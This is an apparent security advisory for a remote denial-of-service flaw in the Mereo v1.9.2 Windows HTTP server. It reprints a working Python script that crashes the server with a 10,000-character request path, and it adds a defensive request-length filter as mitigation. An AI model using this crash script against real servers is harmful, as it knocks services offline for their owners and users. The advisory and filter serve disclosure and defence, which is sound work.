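Published: 2010-08-30
Affected version: Mereo v1.9.2
Vulnerability description:
Mereo is a small HTTP server that runs on the Windows platform.
A remote attacker can crash the mereo.exe process by sending a malicious HTTP request to the Mereo server.
<*Reference
CwG GeNiuS (cwggenius@gmail.com)
*>
Test method:
The program (method) provided by this site may be offensive in nature. It is for security research and teaching only; use at your own risk!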
```python
#!/usr/bin/python
############################################################################
# Title: Mereo v1.9.2 Remote HTTP Server DoS (0day)
# By: CwG GeNiuS
# Email: cwggenius [at] gmail [dot] com
# Tested: XPSP3
# Download: http://www.ohloh.net/p/mereo
############################################################################

import socket, sys

payload ="GET /";
payload+="X" * 10000;
payload+=" HTTP/1.1\r\n\r\n";

count = 1;

try:
    while (count < 100):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        print ("[*] Connecting to httpdx server.");
        s.connect((sys.argv[1], 80));
        print ("\n[*] Sending command.\n");
        s.send(payload);
        s.close();
        count = count+1;
        print count;
except:
    print "Successfully Crashed!";
```

Security advice:
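Vendor patch:
Mereo
-----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.assembla.com/wiki/show/mereo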
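
With no vendor fix available, one mitigation is to reject over-long request lines in a filter or reverse proxy placed in front of Mereo, and to alert on sources that send them repeatedly. The sketch below is an added example, not part of the original advisory or the Mereo project; the length limits, function names and sample traffic are assumptions chosen for illustration.

```python
from collections import Counter

# Assumed limits for this example; tune to the longest legitimate URL on the site.
MAX_REQUEST_LINE = 4096
MAX_TARGET = 2048


def classify_request(raw: bytes) -> int:
    """Return the status a front-end filter would answer with; 0 means forward."""
    line, sep, _ = raw.partition(b"\r\n")
    if len(line) > MAX_REQUEST_LINE:
        return 414                      # URI Too Long, never reaches the backend
    if not sep:
        return 400                      # request line not terminated
    parts = line.split(b" ")
    if len(parts) != 3:
        return 400                      # not "METHOD target VERSION"
    method, target, version = parts
    if len(target) > MAX_TARGET:
        return 414
    if not method.isalpha() or version not in (b"HTTP/1.0", b"HTTP/1.1"):
        return 400
    return 0


def noisy_sources(events, threshold=5):
    """events: iterable of (source_ip, raw_request) pairs.
    Return sources with at least `threshold` oversized (414) requests."""
    hits = Counter(src for src, raw in events if classify_request(raw) == 414)
    return sorted(src for src, n in hits.items() if n >= threshold)


# Constructed sample traffic (documentation address ranges, not real captures).
OVERSIZED = b"GET /" + b"X" * 10000 + b" HTTP/1.1\r\n\r\n"
NORMAL = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
SAMPLE = [("192.0.2.10", OVERSIZED)] * 8 + [("198.51.100.7", NORMAL)] * 3

if __name__ == "__main__":
    print(classify_request(NORMAL), classify_request(OVERSIZED))
    print(noisy_sources(SAMPLE))
```

The same length check can be applied to stored proxy or packet-capture data to find earlier crash attempts against an exposed Mereo instance.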